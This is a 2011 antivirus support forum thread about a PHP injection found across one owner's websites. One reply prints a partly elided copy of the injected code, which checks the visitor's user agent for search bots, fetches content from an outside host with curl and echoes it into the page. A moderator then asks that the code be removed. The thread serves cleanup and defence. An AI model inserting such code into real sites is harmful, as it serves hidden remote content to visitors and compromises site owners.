Author Topic: m-e.crossfitharlem.net/z/st1 MALWARE Impossible to fix?  (Read 3825 times)

0 Members and 1 Guest are viewing this topic.

james26

  • Guest
m-e.crossfitharlem.net/z/st1 MALWARE Impossible to fix?
« on: October 19, 2011, 11:03:29 AM »
Hello,

Avast shows this malware "m-e.crossfitharlem.net/z/st1"  and it is found across all our sites on one server, for example this one of ours: http://marijuanapictures.com/

Avast themselves have been in contact and says this script has been added to all our sites.

Where is it?
What is it?
Where is it directing people to?
How do we remove it!?

Many thanks for any help you guys and girls might have.

Regards
James

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 76037
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: m-e.crossfitharlem.net/z/st1 MALWARE Impossible to fix?
« Reply #1 on: October 19, 2011, 11:32:30 AM »
W8.1 [x64] - Avast Free AV 23.3.8047.BC [UI.757] - Firefox ESR 102.9 [NS/uBO/PB] - Thunderbird 102.9.1
Avast-Tools: Secure Browser 109.0 - Cleanup 23.1 - SecureLine 5.18 - DriverUpdater 23.1 - CCleaner 6.01
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

sharp1001

  • Guest
Re: m-e.crossfitharlem.net/z/st1 MALWARE Impossible to fix?
« Reply #2 on: October 22, 2011, 06:26:31 AM »
Hi, james26 and Asyn


After spending 18 Hours, now i found out the Solution/Removal of this Malware :) from Websites.

1. Download to your whole website
2. Manually find out this given Malicious code and DELETE it from ALL of your web-pages.

Malicious Code:
_______________________________________

<?php

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&
----
-----
----
----
---------
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}

?>

________________________________________________



EnJoy & Good Luck :)

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89061
  • No support PMs thanks
Re: m-e.crossfitharlem.net/z/st1 MALWARE Impossible to fix?
« Reply #3 on: October 22, 2011, 03:03:45 PM »
It is best not to post sample code even if some of it is chopped, the last thing we want is for avast to alert on its own support site, so it is best to use an image.

Please remove the code.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.3.6108 (build 24.3.8975.762) UI 1.0.801/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

alpha1

  • Guest
Re: m-e.crossfitharlem.net/z/st1 MALWARE Impossible to fix?
« Reply #4 on: October 22, 2011, 04:05:24 PM »
the last thing we want is for avast to alert on its own support site

that would be ironic.  ;D

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89061
  • No support PMs thanks
Re: m-e.crossfitharlem.net/z/st1 MALWARE Impossible to fix?
« Reply #5 on: October 22, 2011, 04:59:03 PM »
It wouldn't be the first time with people posting example code and not an image.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.3.6108 (build 24.3.8975.762) UI 1.0.801/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security